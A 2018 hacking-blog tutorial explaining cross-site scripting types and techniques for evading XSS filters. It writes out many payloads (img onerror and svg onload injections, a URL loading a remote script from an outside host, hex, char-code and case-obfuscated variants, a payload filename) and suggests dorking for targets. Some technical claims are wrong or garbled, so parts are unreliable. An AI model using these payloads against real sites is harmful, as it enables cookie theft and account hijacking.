What is XSS and How to bypass filters? | Hackers Creed - Hackers Creed | Legends Of Hacking , Tricks And Tips , Earn Money Online

Thursday, 18 January 2018

What is XSS and How to bypass filters? | Hackers Creed

What is XSS(Cross site scripting)? How to bypass filter??


Hello Guys,This is Yeasir Arafat I am a Independent Security Researcher from Bangladesh .Few noob guys request me to write a note about what is xss(cross site scripting) and how does it works.I hope this write-up will helpful for them.Today I will cover here :
1.What is XSS?
2.Types of xss &
3.How to bypass filters?

1.What is XSS?

Cross Site Scripting also known as XSS , is one of the most common and familiar web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users. In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . Using this malicious code, the attackers can steal the victim’s credentials, such as cookies. The access control policies (i.e., the same origin policy) employed by the browser to protect those credentials can be bypassed by exploiting the XSS vulnerability. Vulnerabilities of this kind can potentially lead to large-scale attacks.


Finding Vulnerable website:
XSS can be everywhere.Since xss is a web application vulnerability You can find vulnerable website by using google dork (ex,inurl:.com/search.asp).Normally in a targeted website you can find vulnerabilities by injecting malicious codes.
" > < img src = x onerror = prompt(xss-by-nu11_54!n7)>

Here you need to know and start with the basic thing of xss.You can practice with DVWA Or bWAPP which are best for understanding how xss works.


2.Types of xss:

1.Self xss
2.Reflected xss
3.Stored xss
4.Dom based(server-side) xss

Self xss:
Most of the websites are suffered from self xss.Self-xss is a form of xss vulnerability which relies on Social Engineering in order to trick a victim into executing malicious javascript code into their browser.Though this is not a true xss vulnerability due to the fact it relies on social engineering a user into executing code rather than a flew in the affected website.
You can pop-up a window with the help of your browser(Chrome,Firefox) from developer console.



Reflected xss:

Reflected cross site scripting attacks is also known as non-presistent attacks,occur when a malicious script reflected off of a web application to the victims browser. To exploit this vulnerability, the application takes one or more parameters as an input, which is reflected back to the web page generated by the application.
The first instance is of quite concern, as this allows a hacker to execute client-side JavaScript code of his choice to be rendered and executed by the browser of the victim or the viewer viewing the page. In this case, it gets worse when the session or other essential cookies of the user are available to be stolen through the document. cookie property of JavaScript.
Consider the following JavaScript code:

<a href= "javascript:alert('myxssruns')" >Click Me</a>

here is when this payloads gets rendered and the user/victim clicks on the Click Me link, then the aforementioned JavaScript code executes. the user or the victim clicks on our controlled link on the affected page his security is compromised.
or something like this:

http://forum.com/?q=news<SCRIPT SRC=" http://ha.ckers.org/xss.js "></SCRIPT>

Here this url will be taken to forum's website,where the malicious script will be reflected back their browser, enabling the perpetrator to steal their session cookies and hijack their forum accounts.

Stored xss:
The most damaging type of xss is Stored xss is also known as presistent xss.This type of XSS vulnerability differs from reflected XSS . It means that the payload, once inserted into a page, will stay and execute permanently on the page.
Comment box on a blog or in a forum post is the best option to find out stored xss.

When a victim/user navigates to the affected web pages into the web browser, the payload which was injected by an attacker will be served as a part of the web pages.This means that, the victim/user will inadvertently end-up executing the malicious script once the page is viewed in a browser.
An attacker adds the following comment:

" > < svg/onload= prompt(document.cookies) >

From here,every time the page is accesed or visited by any user,the html tag in the comment will activate a javascript file which is differently hosted into another site and has the ability to steal visitors session cookies.Usin gthis session cookies the attacker can compromise the visitors account,also can get easy access to his personal information and credit card data.

Dom based xss: Image result for XSS Wallpapers
Dom based xss arise when a client side script within an application's response reads data from a controllable part of the dom and executes the data as javascript.This xss vulnerability is completely differs from others but impact is same.I belive an attacker-supplied code can perform a wide range of variety of actions,such as stealing the vistim's session token or login credentials.

Here is a interesting things I want to let you know about this vulnerability,Dom based xss is always performed into the client side attack and the attacker payload is never sent to the server.This makes even more difficult to detect for web appliactions firwalls and security engineers analyzing the server's logs since they will never even see the attack.
There are some objects in particular which an attacker can manipulate in order to generate the xss.Some of these objects include the url (document.URL),the part of the url behind the hash(location.hash) and the referrer(document.referrer).

Let us consider the following piece of code to better understand DOM-based XSS:
<html>
<head>
<title>DOM-based XSS</title>
</head>
<body>
<script>
name = location.hash.substring(1);
document.write("<b>Hey "+unescape(name)+"! XSS by nu11_54!n7 </ b>");
</script>

</body>
</html>

Note:This code takes an input from (location.hash) and then uses that to create a message using the document.write() function dynamically.There have some Common sinks that cause DOM-based XSS you can search it on google.


3.XSS filter bypass techniques:

May be you have heard about xss filter bypass.Some times you inject a payload into your targeted website and you got nothing,nothing means you don't get any pop-up message or alert window into that websites.Probably you think this sites are not vulnerable to xss.There is some tricky way to find there xss vuln.Most of the web application use advanched firewall those can filter normal xss payload .I used following ways to bypass those filters:
1.Bypassing magic quotes gpc
2.Convert it to ascii values(string.char)
3.Hex encoding
4.Bypassing using Obfuscation < ScRipt > ALeRt( "hi ");< /sCRipT>
5.Closing tag “/> " > < />
6.xss payload with photos

1.Bypassing magic quotes gpc:

The magic_quotes_gpc=ON is a PHP setting(configured in PHP.ini File) , it escapes the every ' (single-quote), " (double quote) and \ with a backslash automatically.
For Example:
< scirpt >alert( " xss-by-Yeasir ");</script> will be filtered as <script>alert(\ xss-by-Yeasir \)</ script>.so the script won't work now.

2.Convert it into ASCII values:

we can easily bypass this filter by using ASCII characters instead.we can easily bypass this filter by using ASCII characters instead.
For Eg: alert("Xss-by-Yeasir"); can be converted to
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 120, 115, 115, 45, 98, 121, 45, 89, 101, 97, 115, 105, 114, 34, 41, 59)
so the script will become < script >String.fromCharCode( 97, 108, 101, 114, 116, 40, 34, 120, 115, 115, 45, 98, 121, 45, 89, 101, 97, 115, 105, 114, 34, 41, 59 )< /script >. In this case there is no "(quotes) or '(single quotes) or / so the filter can't filter this thing, it will successfully run the script.

3.Hex Encoding:

we can encode our whole script into HEX code so that it can't be filtered. This could be done by with the help of advanched/modified hackbar addon on firefox.
For example: " > < img src=x onerror = alert(x ss-by-yeasir ) > can be convert to HEX as:
%22%3e%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%78%73%73%2d%62%79%2d%79%65%61%73%69%72%29%3e%20
Now you can insert this payload where you want. :)
4.Bypassing using Obfuscation :
Some website admin put the script,alert in restricted word list. so whenever you input this keywords, the filter will remove it and will give error message like "you are not allowed to search this". This can bypassed by changing the case of the keywords(namely Obfuscation).
For example:
< ScRipt >ALeRt( "Xss-by-Yeasir" );</ sCRipT >
Note: This bypass technique rarely works but giving trial is worth.
5.Closing tag:
Sometimes putting " > ,"/ > at the beginning of the code will work.
"> < script >alert( "Xss-by-Yeasir" );</ script >
"/ > < svg/onload = alert ( "xss-by-yeasir" );>
6.Run Xss payload with images:
we can use a image as a xss payload and there is a possibility to bypass xss filter by using images.It needed to be rename an images with xss payload as follows:
" > < img src= x onerror=alert( xss-by-yeasir ) >.jpg
here (.jpg) is the extension of an images and " > < img src=x onerror = alert( xss-by-yeasir ) > this is the name of that images.
Note: we need linux to perform this kind of bypass.
Here is a list of some Xss filter Evasion Cheat Sheet
Some useful resources:
Disclaimer:
This article is intended for educational purpose only. Thanks :) Specially Thanks To Writter Of This Article Mr.Yeasir Arfat :) Thanks For This Great Sharing

No comments:

Post a Comment